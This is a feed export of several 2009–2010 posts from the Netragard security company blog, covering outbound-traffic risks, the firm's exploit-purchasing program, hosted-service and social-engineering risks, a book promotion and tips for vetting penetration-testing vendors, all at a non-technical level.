Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com22tag:blogger.com,1999:blog-422477430134849438.post-37546361876351513552010-04-06T13:25:00.000-07:002010-04-06T13:57:58.683-07:00Outbound Traffic Risk and ControllsRecently <a href="http://www.snosoft.com/hacked.html">one of our customers</a> asked me to provide them with information about the risks of unrestricted or lightly restricted outbound network traffic. As such, I decided to write this blog entry and share it with everyone. While some of the risks behind loose outbound network controls are obvious, others <span class="blsp-spelling-error" id="SPELLING_ERROR_0">aren</span>’t so obvious. I hope that this blog entry will help to shed some light on the not so obvious risks…<br /><br />In all networks, there are two general types of network traffic, inbound and outbound. Inbound network traffic is the type of traffic that is generated when an Internet based user makes a network connection to a device that exists in your business infrastructure. Examples of such connections are browsing to your website, establishing a <span class="blsp-spelling-error" id="SPELLING_ERROR_1">VPN</span> connection, checking email, etc. Outbound network traffic is the type of traffic that is generated when a LAN based user (or a <span class="blsp-spelling-error" id="SPELLING_ERROR_2">VPN</span> connected user in some cases) makes a network connection to a device somewhere on the Internet.<br /><br />Just about everyone is familiar with the risks that are associated with the inbound type. Those risks include things like Vulnerable Web Applications, <span class="blsp-spelling-error" id="SPELLING_ERROR_3">unpatched</span> services running on Internet facing production systems, etc. In fact, most people associate the idea of security with the inbound connection type more so than the outbound type. As a result, they end up leaving the most vulnerable part of their business open to attack.<br /><br />The truth is that the size of the attack surface for the outbound connection type is considerably larger than that of the inbound connection type. The attack surface is best defined as the sum of all potential risk points for a particular group of targets. In the case of the outbound connection type, the potential risk points include every variant of software installed on every device capable of making outbound connections (and helper applications too). This includes technologies like Adobe Acrobat, Mozilla <span class="blsp-spelling-error" id="SPELLING_ERROR_4">Firefox</span>, Internet Explorer, Flash, <span class="blsp-spelling-error" id="SPELLING_ERROR_5">QuickTime</span>, Microsoft Office, Safari, FTP Programs, Security Scanners, Antivirus Technologies, <span class="blsp-spelling-error" id="SPELLING_ERROR_6">Smartphones</span>, etc.<br /><br />One example of an attack would be something like this. An employee receives an email containing an interesting blog entry from <span class="blsp-spelling-error" id="SPELLING_ERROR_7">Netragard</span>, <span class="blsp-spelling-error" id="SPELLING_ERROR_8">LLC</span>. That email contains a link that points to a malicious payload designed to compromise the employees computer. When the link is clicked, a request is made to download the payload, which results in the employees computer being compromised. Upon compromise the employees computer establishes an outbound *HTTPS connection to the attacker, and the attacker tunnels back in over that connection to take control of the employees computer. In most cases, the employee has no idea that they’<span class="blsp-spelling-error" id="SPELLING_ERROR_9">ve</span> been compromised, nor does their employer.<br /><br /><div style="text-align: center;"><span style="color: rgb(255, 0, 0);font-size:78%;" >*Because the connection is an HTTPS connection IDS/<span class="blsp-spelling-error" id="SPELLING_ERROR_10">IPS</span> technologies won’t flag it as suspicious nor is it possible to sniff the connection since its encrypted with <span class="blsp-spelling-error" id="SPELLING_ERROR_11">SSL</span>. </span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_1CCB-WUcnl1K-urWRBRq1fNb51xLOM0iZXA4BzGGDwC8jqCHaOYsIdD-44ERSuiCAeEbNqd2hhrtWzLtPI8EpQLlgvl1B2iZihdaK2skxPmeh5DJvfknJ6ld-0wY2xTgvPogIuhBGoc/s1600/spotthegeek.JPG"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_1CCB-WUcnl1K-urWRBRq1fNb51xLOM0iZXA4BzGGDwC8jqCHaOYsIdD-44ERSuiCAeEbNqd2hhrtWzLtPI8EpQLlgvl1B2iZihdaK2skxPmeh5DJvfknJ6ld-0wY2xTgvPogIuhBGoc/s400/spotthegeek.JPG" alt="" id="BLOGGER_PHOTO_ID_5457130358742215346" border="0" /></a><span style="font-size:78%;">(SNOsoft's Jayson Street)</span><br /></div><br />The compromise <span class="blsp-spelling-error" id="SPELLING_ERROR_12">doesn</span>’t stop at the employees computer. The instant that the employees computer is compromised then the network that the computer is connected to is also compromised. At that point the attacker can use <span class="blsp-spelling-error" id="SPELLING_ERROR_13">ARP</span> Poisoning to perform Man in the Middle attacks (or other more direct attacks), or just to capture user credentials. Either way distributed metastasis is almost inevitable if the attacker has any semblance of skill. (Thank god <span class="blsp-spelling-error" id="SPELLING_ERROR_14">Netragard</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_15">didn</span>’t really embed a malicious link in this blog entry right?).<br /><br />The good news is that suffering a compromise <span class="blsp-spelling-error" id="SPELLING_ERROR_16">doesn</span>’t need to be costly or technically damaging. If the proper policies, procedures and controls are in place then a compromise can be relatively harmless from a cost in damages perspective. Outbound connection controls are an example of controls that everyone should have in place.<br /><br />If outbound connections are restricted to specific protocols and can only be established by authenticated users then attacks like the one described above will be largely ineffective. The outbound controls might not always prevent the users computer from being compromised, but they will usually prevent the users computer from establishing a connection back to the attacker (which will ideally prevent the attacker from taking control of the computer). In such a case, the computer will need to be reinstalled but at least the rest of the network will still be intact.<div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-76105057223160868212010-03-28T16:20:00.000-07:002010-03-28T19:09:28.462-07:00Exploit Acquisition Program - More DetailsThe recent news on <a href="http://blogs.forbes.com/firewall/2010/03/25/the-bounty-for-an-apple-bug-115000/">Forbes</a> about our Exploit Acquisition Program has generated a lot of interesting speculative controversy and curiosity. As a result, I've decided to take the time to follow up with this blog entry. Here I'll make a best effort to explain what the Exploit Acquisition Program is, why we decided to launch the program, and how the program works. <div><br /></div><div><b><span class="Apple-style-span" style="font-size:x-large;">What it is:</span></b></div><div><br /></div><div>The Exploit Acquisition Program ("<span class="blsp-spelling-error" id="SPELLING_ERROR_0"><span class="blsp-spelling-error" id="SPELLING_ERROR_0">EAP</span></span>") officially started in May of 1999 and is currently being run by <span class="blsp-spelling-error" id="SPELLING_ERROR_1"><span class="blsp-spelling-error" id="SPELLING_ERROR_1">Netragard</span></span>, <span class="blsp-spelling-error" id="SPELLING_ERROR_2"><span class="blsp-spelling-error" id="SPELLING_ERROR_2">LLC</span></span>. <span class="blsp-spelling-error" id="SPELLING_ERROR_3"><span class="blsp-spelling-error" id="SPELLING_ERROR_3">EAP</span></span> specifically designed to acquire "actionable research" in the form of working exploits from the security community. The Exploit Acquisition Program is different than other programs because participants receive significantly higher pay for their work and in most cases the exploits never become public knowledge.</div><div><br /></div><div>The exploits that are acquired via the <span class="blsp-spelling-error" id="SPELLING_ERROR_4"><span class="blsp-spelling-error" id="SPELLING_ERROR_4">EAP</span></span> are sold directly to specific US based clients that have a unique and justifiable need for such technologies. At no point does <span class="blsp-spelling-error" id="SPELLING_ERROR_6"><span class="blsp-spelling-error" id="SPELLING_ERROR_5">Netragard</span></span> sell or otherwise export acquired exploits to any foreign entities. Nor do we disclose any information about our buyers or about participating researchers. </div><div><br /></div><div><b><span class="Apple-style-span" style="font-size:x-large;">Why did we start the <span class="blsp-spelling-error" id="SPELLING_ERROR_7"><span class="blsp-spelling-error" id="SPELLING_ERROR_6">EAP</span></span>?</span></b></div><div><span class="Apple-style-span" style="font-size:x-large;"><b><br /></b></span></div><div><span class="blsp-spelling-error" id="SPELLING_ERROR_8"><span class="blsp-spelling-error" id="SPELLING_ERROR_7">Netragard</span></span> launched the <span class="blsp-spelling-error" id="SPELLING_ERROR_9"><span class="blsp-spelling-error" id="SPELLING_ERROR_8">EAP</span></span> to give security researchers the opportunity to receive fair value for their research product. Our bidding prices start at or around $15,000 per exploit. That price is affected by many different variables. </div><div><br /></div><div><b><span class="Apple-style-span" style="font-size:x-large;">How does the <span class="blsp-spelling-error" id="SPELLING_ERROR_10"><span class="blsp-spelling-error" id="SPELLING_ERROR_9">EAP</span></span> Work?</span></b></div><div><br /></div><div><b>The <span class="blsp-spelling-error" id="SPELLING_ERROR_11"><span class="blsp-spelling-error" id="SPELLING_ERROR_10">EAP</span></span> works as follows:</b></div><div><ol><li>Researcher contacts <span class="blsp-spelling-error" id="SPELLING_ERROR_12"><span class="blsp-spelling-error" id="SPELLING_ERROR_11">Netragard</span></span>.</li><li>Researcher and <span class="blsp-spelling-error" id="SPELLING_ERROR_13"><span class="blsp-spelling-error" id="SPELLING_ERROR_12">Netragard</span></span> execute a Mutual Nondisclosure Agreement.</li><li>Researcher provides a <span class="blsp-spelling-corrected" id="SPELLING_ERROR_14">verifiable</span> form of identification to <span class="blsp-spelling-error" id="SPELLING_ERROR_15"><span class="blsp-spelling-error" id="SPELLING_ERROR_13">Netragard</span></span>.</li><li>Researcher fills out an Exploit Acquisition Form ("<span class="blsp-spelling-error" id="SPELLING_ERROR_16"><span class="blsp-spelling-error" id="SPELLING_ERROR_14">EAF</span></span>").</li><li><span class="blsp-spelling-error" id="SPELLING_ERROR_17"><span class="blsp-spelling-error" id="SPELLING_ERROR_15">Netragard</span></span> works with the buyer to determine exploit value based on the information provided in the <span class="blsp-spelling-error" id="SPELLING_ERROR_16">EAF</span>.</li><li>Researcher accepts or rejects the price. <b><span class="Apple-style-span" style="color: rgb(255, 0, 0);"><span class="Apple-style-span" style="font-size:x-small;">Note:</span></span></b><span class="Apple-style-span" style="color: rgb(255, 0, 0);"><span class="Apple-style-span" style="font-size:x-small;"> If rejected, the process stops here.</span></span></li><li>Researcher submits the exploit code and vulnerability details to <span class="blsp-spelling-error" id="SPELLING_ERROR_18"><span class="blsp-spelling-error" id="SPELLING_ERROR_17">Netragard</span></span>.</li><li><span class="blsp-spelling-error" id="SPELLING_ERROR_19"><span class="blsp-spelling-error" id="SPELLING_ERROR_18">Netragard</span></span> verifies that the exploit works as advertised.</li><li>If the exploit does not work as advertised then the researcher is given the opportunity to resolve the issue(s).</li><li>If the exploit does work as advertised then the purchase agreement is delivered to the researcher. </li><li>Researcher executes purchase agreement and transfers all rights and ownership of the exploit and any <span class="blsp-spelling-corrected" id="SPELLING_ERROR_20">information</span> related to the exploit to <span class="blsp-spelling-error" id="SPELLING_ERROR_21"><span class="blsp-spelling-error" id="SPELLING_ERROR_19">Netragard</span></span>. <span class="Apple-style-span" style="color: rgb(255, 0, 0);">At this point researcher loses all rights to the exploit and its respective information.</span></li><li><span class="blsp-spelling-error" id="SPELLING_ERROR_22"><span class="blsp-spelling-error" id="SPELLING_ERROR_20">Netragard</span></span> begins the payment process.</li><li>Payments are issued in three equal installments over the course of three months. </li></ol><span class="Apple-style-span" style="font-weight: bold;"><span class="blsp-spelling-error" id="SPELLING_ERROR_23"><span class="blsp-spelling-error" id="SPELLING_ERROR_21">EAP</span></span> Rules</span><br /><div><ol><li><span class="blsp-spelling-error" id="SPELLING_ERROR_24"><span class="blsp-spelling-error" id="SPELLING_ERROR_22">Netragard</span></span> requires exclusivity for all exploits purchased through the <span class="blsp-spelling-error" id="SPELLING_ERROR_25"><span class="blsp-spelling-error" id="SPELLING_ERROR_23">EAP</span></span>.</li><li>Ownership of the exploit and its respective vulnerability information are <span class="blsp-spelling-corrected" id="SPELLING_ERROR_26">transferred</span> from researcher to <span class="blsp-spelling-error" id="SPELLING_ERROR_27"><span class="blsp-spelling-error" id="SPELLING_ERROR_24">Netragard</span></span> at step 11 above. Prior to step 11 the exploit and its respective vulnerability information are the intellectual property of the researcher. If at any point before step 11 the researcher terminates the acquisition process then <span class="blsp-spelling-error" id="SPELLING_ERROR_28"><span class="blsp-spelling-error" id="SPELLING_ERROR_25">Netragard</span></span> will destroy any and all information related to failed transaction. <b>Termination of sale is not possible after step 11.</b></li><li><span class="blsp-spelling-error" id="SPELLING_ERROR_29"><span class="blsp-spelling-error" id="SPELLING_ERROR_26">Netragard</span></span> will not identify its buyers.</li><li><span class="blsp-spelling-error" id="SPELLING_ERROR_30"><span class="blsp-spelling-error" id="SPELLING_ERROR_27">Netragard</span></span> will not identify researchers.</li><li>All transactions between buyer, <span class="blsp-spelling-error" id="SPELLING_ERROR_28">Netragard</span> and developer are done legally and contractually. At no point will <span class="blsp-spelling-error" id="SPELLING_ERROR_29">Netragard</span> engage in illegal activity or with unknown, untrusted, and/or <span class="blsp-spelling-corrected" id="SPELLING_ERROR_30">unverifiable</span> sources or entities. </li></ol></div></div><div>If you are interested in selling your exploit to us, please contact us at eap@netragard.com. </div><div><br /></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-56906456749933837032010-03-04T17:03:00.000-08:002010-03-25T20:19:57.786-07:00Professional Script Kiddies vs Real TalentThe Good Guys in the security world are no different from the Bad Guys; most of them are nothing more than glorified Script Kidies. The fact of the matter is that if you took all of the self-proclaimed hackers in the world and you subjected them to a litmus test, very few would pass as acutal hackers.<br /><br />This is true for both sides of the so called Black and White hat coin. In the Black Hat world, you have script-kids who download programs that are written by other people then use those programs to “hack” into networks. The White Hat’s do the exact same thing; only they buy the expensive tools instead of downloading them for free. Or maybe they’re actually paying for the pretty GUI, who knows?<br /><br />What is pitiable is that in just about all cases these script kiddies have no idea what the programs actually do. Sometimes that’s because they don’t bother to look at the code, but most of the time its because they just can’t understand it. If you think about it that that is scary. Do you really want to work with a security company that launches attacks against your network with tools that they do not fully understand? I sure wouldn’t.<br /><br />This is part of the reason why I feel that it is so important for any professional security services provider to maintain an active research team. I’m not talking about doing market research and pretending that its security research like so many security companies do. I’m talking about doing actual vulnerability research and exploit development to help educate people about risks for the purposes of defense. After all, if a security company can’t write an exploit then what business do they have launching exploits against your company?<br /><br />I am very proud to say that Everything Channel recently released the 2010 CRN Security Researchers list and that <a href="http://www.netragard.com/">Netragard’s Kevin Finisterre</a> was on the list. Other people that were included in the list are people that I have the utmost respect for. As far as I am concerned,<a href="http://www.entrepreneur.com/prnewswire/release/242610.html"> these are <b>some</b> of the best guys in the industry:</a> <span style="font-size:85%;">(clearly this list is not all inclusive and in no way includes all of the people that deserve credit for their contributions and/or talent). </span><br /><br /><ul><li>Dino Dai Zovi </li><li>Kevin Finisterre </li><li>Landon Fuller </li><li>Robert Graham </li><li>Jeremiah Grossman </li><li>Larry Highsmith </li><li>Billy Hoffman </li><li>Mikko Hypponen </li><li>Dan Kaminsky </li><li>Paul Kocher </li><li>Nate Lawson </li><li>David Litchfield </li><li>Charles Miller </li><li>Jeff Moss<br /></li><li>Jose Nazario<br /></li><li>Joanna Rutkowska</li></ul><br />In the end I suppose it all boils down to what the customer wants. Some customers want to know their risks; others just want to put a check in the box. For those who want to know what their real risks are, <a href="http://www.netragard.com/">you’ve come to the right place</a>.<div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com14tag:blogger.com,1999:blog-422477430134849438.post-46277523404748701552009-10-12T16:10:00.000-07:002009-10-12T16:14:00.507-07:00Hosted Solutions – A Hackers Haven<!--StartFragment--> <p class="MsoNormal">Human beings are lazy by nature.<span style="mso-spacerun: yes"> </span>If there is a choice to be made between a complicated technology solution and an easy technology solution, then nine times out of ten people will choose the easy solution.<span style="mso-spacerun: yes"> </span>The problem is that the easy solutions are often riddled with hidden risks and those risks can end up costing the consumer more money in damages then what might be saved by using the easy solution.</p> <p class="MsoNormal">The advantages of using a managed hosting provider to host your email, website, telephone systems, etc, are clear.<span style="mso-spacerun: yes"> </span>When you outsource critical infrastructure components you save money.<span style="mso-spacerun: yes"> </span>The savings are quickly realized because you no longer need to spend money running a full scale IT operation.<span style="mso-spacerun: yes"> </span>In many cases, you don’t even need to worry about purchasing hardware, software, or even hiring IT staff to support the infrastructure. <span style="mso-spacerun: yes"> </span></p> <p class="MsoNormal">What isn’t clear to most people is the serious risk that outsourcing can introduce to their business.<span style="mso-spacerun: yes"> </span>In nearly all cases a business will have a radically lower risk and exposure profile if they keep everything in-house.<span style="mso-spacerun: yes"> </span>This is true because of the substantial attack surface that hosting providers have when compared to in-house IT environments.</p> <p class="MsoNormal">For example, a web-hosting provider might host 1,000 websites across 50 physical servers.<span style="mso-spacerun: yes"> </span>If one of those websites contains a single vulnerability and that vulnerability is exploited by a hacker then the hacker will likely take control of the entire server.<span style="mso-spacerun: yes"> </span>At that point the hacker will have successfully compromised and taken control of all 50 websites with a single attack. <span style="mso-spacerun: yes"> </span></p> <p class="MsoNormal">In non-hosted environments there might be only one Internet facing website as opposed to the 1000 that exist in a hosted environment.<span style="mso-spacerun: yes"> </span>As such the attack surface for this example would be 1000 times greater in a hosted environment than it is in a non-hosted environment.<span style="mso-spacerun: yes"> </span>In a hosted environment the risks that other customers introduce to the infrastructure also become your risk. <span style="mso-spacerun: yes"> </span>In a non-hosted environment you are only impacted by your own risks.</p> <p class="MsoNormal">To make matters worse, many people assume that such a risk isn’t significant because they do not use their hosted systems for any critical transactions.<span style="mso-spacerun: yes"> </span>They fail to consider the fact that the hacker can modify the contents of the compromised system.<span style="mso-spacerun: yes"> </span>These modifications can involve redirecting online banking portal links, credit card form posting links, or even to spread infectious malware. <span style="mso-spacerun: yes"> </span>While this is true for any compromised system, the chances of suffering a compromise in a hosted environment are much greater than in a non-hosted environment.</p> <!--EndFragment--><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com11tag:blogger.com,1999:blog-422477430134849438.post-33662122149751631992009-09-22T11:28:00.000-07:002009-09-22T11:45:12.652-07:00Social Engineering – It’s Nothing New<div style="text-align: left;">With all the recent hype about Social Engineering <a href="http://www.netragard.com/">we</a> figured that we’d chime in and tell people what’s really going on.<span style="mso-spacerun: yes"> </span>The fact is that Social Engineering is nothing more than a Confidence Trick being carried out by a Con Artist.<span style="mso-spacerun: yes"> </span>The only difference between the term Social Engineering and Confidence Trick is that Social Engineering is predominately used with relation to technology.</div> <p class="MsoNormal">So what is it really? Social Engineering is the act of exploiting a person’s natural tendency to trust another person or entity.<span style="mso-spacerun: yes"> </span>Because the vulnerability exists within people, there is no truly effective method for remediation.<span style="mso-spacerun: yes"> </span>That is not to say that you cannot protect your sensitive data, but it is to say that you cannot always prevent your people or even yourself from being successfully conned.</p> <p class="MsoNormal">The core ingredients required to perform a successful confidence trick are no different today then they were before the advent of the Internet. <span style="mso-spacerun: yes"> </span>The con artist must have the victim’s trust, and then trick the victim into performing an action or divulging information.<span style="mso-spacerun: yes"> </span>The Internet certainly didn’t create the risk but it does make it easier for the threat to align with the risk.</p> <p class="MsoNormal">Before the advent of the Internet the con artist (threat) needed to contact the victim (risk) via telephone, in person, via snail mail, etc.<span style="mso-spacerun: yes"> </span>Once contact was made a good story needed to be put into place and the victim’s trust needed to be earned.<span style="mso-spacerun: yes"> </span>That process could take months or even years and even then success isn’t guaranteed.<span style="mso-spacerun: yes"> </span></p> <p class="MsoNormal">The advent of the Internet provided the threat with many more avenues’ through which it could successfully align with the risk. <span style="mso-spacerun: yes"> </span>Specifically, the Internet enables the threat to align with hundreds or even thousands of risks simultaneously. <span style="mso-spacerun: yes"> </span>That sort of shotgun approach couldn’t be done before and significantly increases an attackers chances of success.<span style="mso-spacerun: yes"> </span>One of the most elementary examples of this shotgun approach is the email based phishing attack.<span style="mso-spacerun: yes"> </span></p> <p class="MsoNormal">The email based phishing attack doesn’t earn the trust of its victims; it steals trust from existing relationships.<span style="mso-spacerun: yes"> </span>Those relationships might exist between the victim and their bank, family member, co-worker, employer, etc.<span style="mso-spacerun: yes"> </span>In all instances the email based phishing attack hinges on the attacker’s ability to send emails that look like they are coming from a trusted source (exploitation of trust).<span style="mso-spacerun: yes"> </span>From a technical perspective, email spoofing and phishing is trivial<span style="mso-spacerun: yes"> </span>(<a href="http://snosoft.blogspot.com/2009/02/facebook-from-hackers-perspective.html"><b><i>click here</i></b></a><b><i> for a more sophisticated attack example</i></b>).</p> <p class="MsoNormal">The reason why it is possible for an attacker to steal trust from a victim instead of earning that trust is because “face to face” trust isn’t portable to the Internet.<span style="mso-spacerun: yes"> </span>For example, most people trust their spouse.<span style="mso-spacerun: yes"> </span>Many people talk to their spouse on AIM, MSN, Yahoo, Skype, etc. while at work.<span style="mso-spacerun: yes"> </span>How do they know that they are really chatting with their spouse and not a hacker?</p> <p class="MsoNormal">So how do you protect against the social risks and prevent the threat from successfully aligning with those risks?<span style="mso-spacerun: yes"> </span>The truth is that you can't. Con artists have been conning people since the dawn of man. The better question what are you doing to <a href="https://www.netragard.com">protect your data</a> from the hacker that does penetrate into your IT Infrastructure? </p><p class="MsoNormal"><br /></p><p class="MsoNormal"><br /></p> <!--EndFragment--><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-4218057131366603922009-07-24T09:35:00.000-07:002009-07-24T09:38:26.767-07:00Why “DISSECTING THE HACK: The F0rb1dd3n Network” was written. By: Jayson E. Street<span style="font-size:85%;"><span style="font-weight: bold;">Note:</span> This blog entry was written by Jayson E. Street and published on his behalf. </span><br /><br />The consumer, the corporate executive, and the government official. Regardless of your perspective, DISSECTING THE HACK: The F0rb1dd3n Network was written to illustrate the issues of Information Security through story. We all tell stories. In fact, we do our best communicating through stories. This book illustrates how very real twenty-first century threats are woven into the daily lives of people in different walks of life.<br /><br />Three kids in Houston, Texas. A mid-level Swiss businessman traveling abroad. A technical support worker with a gambling problem. An international criminal who will do anything for a profit (and maybe other motives). FBI agents trying to unravel a dangerous puzzle. A widower-engineer just trying to survive. These are just some of the lives brought together in a story of espionage, friendship, puzzles, hacks, and more. Every attack is real. We even tell you how some of these attack are done. And we tell you how to defend against varied attacks as well. <br /><br />DISSECTING THE HACK: The F0rb1dd3n Network is a two-part work. The first half is a story that can be read by itself. The second half is a technical reference work that can also be read alone. But together, each provides texture and context for the other. The technical reference – called the STAR or “Security Threats Are Real” – explains the “how” and “why” behind much of the story. STAR addresses technical material, policy issues, hacker culture context, and even explains “Easter Eggs” in the story.<br /><br />This book is the product of a community of Information Security professionals. It is written to illustrate how we are all interesting targets for various reasons. We may be a source of money for criminals through fraud, we might have computing resources that can be used to launch attacks on someone else, or we may be responsible for protecting valuable information. The reasons we are attacked are legion – and so are the ways we are attacked. Our goal is to raise awareness in a community of people who are under-served. Few of us really want dry lectures about how we should act to protect ourselves. But stories of criminals, corporate espionage, friendship and a little juvenile delinquency – now that is the way to learn.<div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-59738183048289631882009-07-16T08:05:00.000-07:002009-07-16T08:32:52.998-07:00Verify Your Security Provider -- The truth behind manual testing.<!--StartFragment--> <p class="MsoNormal">Something that I’ve been preaching for a while is that automated vulnerability scanners do not produce quality results and as such shouldn’t be relied on for penetration tests or vulnerability assessments.<span style="mso-spacerun: yes"> </span>I’ve been telling people that they should look for a security company that offers manual testing, not just automated scans.<span style="mso-spacerun: yes"> </span>The price points for quality work will be significantly higher, but in the end the value is much greater.<span style="mso-spacerun: yes"> </span>After all the cost in damages of a single successful compromise is far greater than the cost of the best possible security services. </p> <p class="MsoNormal">I’ve noticed that there are a bunch of vendors who claim to be performing manual testing.<span style="mso-spacerun: yes"> </span>But when I dig into their methodologies their manual testing isn’t real manual testing at all, its just vetting of automated scanner results or testing based on the results.<span style="mso-spacerun: yes"> </span>In other words they test on what the automated scanner reports and don’t do any real manual discovery.<span style="mso-spacerun: yes"> </span>I’m not saying that tools like nessus (an automated scanner) don’t have their place, I’m just saying that they aren’t going to protect you from the bad guys.<span style="mso-spacerun: yes"> </span>If you want to be protected from the threat, you need to be tested at a level that is a few notches higher than the threat that you are likely to face in the real world.<span style="mso-spacerun: yes"> </span></p> <p class="MsoNormal"><o:p>This is akin to how the Department of Defense tests the armor on its tanks, and I’ve probably mentioned this before somewhere on the blog.<span style="mso-spacerun: yes"> </span>But, we don’t test our tanks against fire from bb guns and .22 caliber pistols.<span style="mso-spacerun: yes"> </span>If we did that they wouldn’t be very effective in war.<span style="mso-spacerun: yes"> </span>We test the tanks against a threat that is a few levels higher in intensity than what they are likely to face in the real world. As a result, the tank can withstand most threats and is a very effective weapon.<span style="mso-spacerun: yes"> </span>Doing anything less isn’t going to protect you when the threat tries to align with your risks; you’ll end up being an expensive casualty of war. </o:p></p> <p class="MsoNormal">So why do some security companies test at this lesser level? Its simple really, they are in the business of making money and care more about that then they do about actually protecting their customer’s infrastructure.<span style="mso-spacerun: yes"> </span>Additionally, there is a market for that sort of low quality testing.<span style="mso-spacerun: yes"> </span>There are some businesses that don’t actually care about their security posture; they just care about passing the test so that they can put a check in their compliancy box.<span style="mso-spacerun: yes"> </span>Then there are other businesses that unknowingly get taken advantage by of vendors because they don’t know the difference between high quality and low quality services.</p> <p class="MsoNormal">So what is the difference between high quality and low quality?<span style="mso-spacerun: yes"> </span>From a high level perspective it’s the difference between real manual research based security testing or not. <span style="mso-spacerun: yes"> </span>Once hackers have access, they can do anything to your data from steal it, to install back door technology in your product's source code.<span style="mso-spacerun: yes"> </span>Its happened before, and its going to happen again.<span style="mso-spacerun: yes"> </span></p><p class="MsoNormal"><span class="Apple-style-span" style="font-weight: bold; ">When a company tells you that they perform manual testing hold their feet to the fire. You can do the following things to verify it:</span></p> <p class="MsoNormal"></p><ul><li>Dig into their methodology and ask them specific questions about how they perform their testing. (See our white papers on how to do that).</li><li>Don’t swallow jargon and terms that sound cool and don’t mean anything, use Wikipedia to look up the terms and make sure that they make sense.</li><li>Ask them for the names of their security experts and then use tools like <a href="http://www.google.com">Google</a>, <a href="http://www.linkedin.com">LinkedIn</a>, <a href="http://www.facebook.com">Facebook</a> and <a href="http://www.pipl.com">PIPL</a> to do research on those experts.<span style="mso-spacerun: yes"> </span>If nothing comes up then chances are their experts aren’t experts at all.</li><li>Search vulnerability databases like <a href="http://www.milw0rm.com/">milw0rm</a>, <a href="http://www.securityfocus.com/">securityfocus</a>, <a href="http://www.vupen.com/english/">sirtfr</a>, <a href="http://secunia.com/advisories/">secunia</a>, <a href="http://www.packetstormsecurity.org/">packetstormsecurity</a>, etc. for the vendor’s name to see if they have <a href="http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Netragard&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0">research capabilities</a>. If you don’t get anything in return then chances are that they don’t have research capabilities.<span style="mso-spacerun: yes"> </span>If that’s the case then how do you expect them to perform quality manual testing?<span style="mso-spacerun: yes"> </span>Chances are that they won’t be able to. <span style="mso-spacerun: yes"> </span></li></ul><p></p> <p class="MsoNormal"><o:p>Remember you’re putting the integrity of your business and its respective name into their hands.</o:p></p> <!--EndFragment--><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com3